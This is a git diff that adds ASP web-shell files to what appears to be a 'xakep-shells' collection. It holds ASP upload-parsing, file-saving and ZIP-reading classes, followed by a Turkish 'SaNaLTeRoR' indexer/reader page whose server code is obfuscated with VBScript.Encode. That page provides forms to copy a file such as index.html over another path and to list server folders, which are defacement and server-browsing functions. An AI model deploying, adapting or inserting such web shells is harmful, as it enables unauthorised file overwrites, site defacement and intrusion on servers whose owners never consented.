+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/indexer.asp.txt b/xakep-shells/ASP/indexer.asp.txt
new file mode 100644
index 0000000..9f1e13b
--- /dev/null
+++ b/xakep-shells/ASP/indexer.asp.txt
@@ -0,0 +1,74 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
+<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+	YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0V�x9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;�Y!Dhl,CCV0�P..k^:k�,#nXmP`x;Y;ssE�~?.\DsCMlP�U[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslM�UPb�+.r�bxk~G0Ehl0~b�kU,Xmy�Vs��Y�M @!(D@*@!^k@*$!P?1.kaYV~$kMP�K3~?rOXnP`�.l�sl[C	P}C4s+O/b"1+~�	N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDr�P*@!Vb@*j^MkwOr	PFE^smx�s���,�V0PAm3��DCPnl.���3,Mnsm+0OkMR@!^r@*S�D0x~ArsTk~29rxs+V~��bxPF;^VCxsC,|�sm\!yE	E,63!X;x!y  c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC	k:xE@!mnxDnM@*@!6W	YP1W^GD{Vr:Pdr.+'l@*|!VVmU�hP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^m��x�y~r	Nn6b~Tk.bx,`bDl1C��x�.Prx9+a~n+x9rPUkYUry9+,rs:Cs�*�DU)Gn0mEsOcl/2@!^k@*1.XnQP~EPn�/sCP�	Nn6bPuC	ok,jkD+X~)Ymmm3dlU�",WUE	~XDrUbPXC"mmC3k�U�.P�.	P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,�Ig3|,"Z@!Jl@*@!J0W	O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nn�r	k"PGGkXC	�x,bN�	�PjnPI+.k	k~emy�x,@!l,tDWxgKD	+V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzP�"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk	NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0k�VE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03�@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6�x[C	P5m"�Vs��Y�Dc@!sk@*f�+.Vr~:lV�:,)D0l[C�^lD�h~_WsXGnsWUvb9:k	#,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n	l~b9hbxr*PBPfVbWk�3~`UlUC^bDUl,bNsrUk*PBPPE.C	/G0D~`:E.C	/WWOcKVPz[skUb#,~Pg+K~.PP�:,b[CsPr^Cx^lDm~P+�30�Ds+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmX�Y*~@!J0W	O@*K!Ysl"R@!sb@*3L9nDbx~ezwY���~$!xCP~n	ynMPUmDbwD~K�sP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCV�sNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:�h~A�^obVnDr~dWLV!zWMVC.*@!Vr@*V�\nx^r,ArMPUmDbwD~��k	Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl	�"�P�	+.rMky E@#@&sk	V^+.{J@!m+	Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~U�K2d3I�@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk	L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC	k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+	@#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
+<center>
+<br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br>
+<hr color=lime width=50%>
+<SCRIPT LANGUAGE="JavaScript">
+ <!-- 
+function Start(page)
+ {
+ OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
+ }
+ //-->
+</SCRIPT>
+<script language="JavaScript1.2">
+var message="SaNaLTeRoR - �nDexEr - Reader"
+var typingbasecolor="red"
+var typingtextcolor="lime"
+var blinkspeed=598 
+var fontface="arial,geneva,helvetica"
+var fontsize="5"
+var n=0
+if (document.all){
+document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
+for (m=0;m<message.length;m++)
+document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
+document.write('</font>')
+var tempref=document.all.typinglight
+}
+else
+document.write(message)
+function typing(){
+if (n==0){
+for (m=0;m<message.length;m++)
+tempref[m].style.color=typingbasecolor
+}
+tempref[n].style.color=typingtextcolor
+if (n<tempref.length-1)
+n++
+else{
+n=0
+clearInterval(blinking)
+setTimeout("starttyping()",1500)
+return
+}
+}
+function starttyping(){
+if (document.all)
+blinking=setInterval("typing()",blinkspeed)
+}
+starttyping()
+</script> 
+<form action="?Gonder" method="post">
+<center><table>
+<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
+<td><input type="submit" onclick="submit()" value="Veriyi G�nder"></td><tr>
+<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value="    Temizle    "></td><tr>
+</form>
+<form action="?oku" method="post">
+<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value="  Veriyi Oku   "></td><tr>
+</form>
+</table><br>
+<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
+Script Hakk�nda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullan�m Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
+<br><br><br>
+<hr color=lime width=50%>
+<%#@~^VA4AAA==n	N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~	+aY@#@&	+.9+	P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n	P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n	YnD@*E@#@&n^/@#@&M+k2W	/nRSDrOPJ��^n:bxk.~$l�mD�^�J@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP	nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+	NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P	WDPnD.~{PTPD4+	P@#@&M+/2G	/nRS.bYn,J@!m+	Y.@*_bPb,)~EL+DM N/mMr2YbW	[E@!^n	YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+	PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]�SAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W	/n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n	NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW	dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW	/nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG	/RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW	/nRA.bYnPrE[DEd'rJ@#@&n	N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G	/nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW	/ hMkO+,JE'DE/LEJ@#@&+	[~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*�V0~�UmPnE.4CU�	PjkDn/bxn~zY:CV,k�rx,8bD~bx9+6,tm"�D^lz�xc@!sr@*?Yc~k	N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC	�xCPI�V^+zbxc@!Vb@*UGxMl~k	Nna,Alk�sl1l3,drYX^+~lzU�,/nD7nD9lU~kkYn~mV�UPJ~wDnVDPb�k	~h4dls4C~bN+ms@!^k@*Grz+^ksP)NCh�	PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l	P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9���x�"�~7lDkCXmV�:@!sr@*UY,kUNnaD~l	[PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k	N6nD Ckw~ob8k,X�VsNkUr.R@!Vb@*_l"�MVmN���x�.PbUN6rNPCz	�PX.+,lYD�U�"R@!Vb@*�r:[r,MnV9rPnE.8mxl~r	Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk	NnP@!WKxOP1GVKDx2bx3@*HD[+	@!J0G	Y@*PXmymUPH+.+,lOC1l��:�.~k	N+Xrhk.k	PCN�U�~Hl"�XK.E.Rcr	N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|�dh�	l~�/~b9lh�U,+8~nlslk�.�,4r.NxP(k.r:,3slk�D[n	P4b~l^YP9r"k	NPGV[;�!Pr�k	~RczhC4:EO&bx[+X 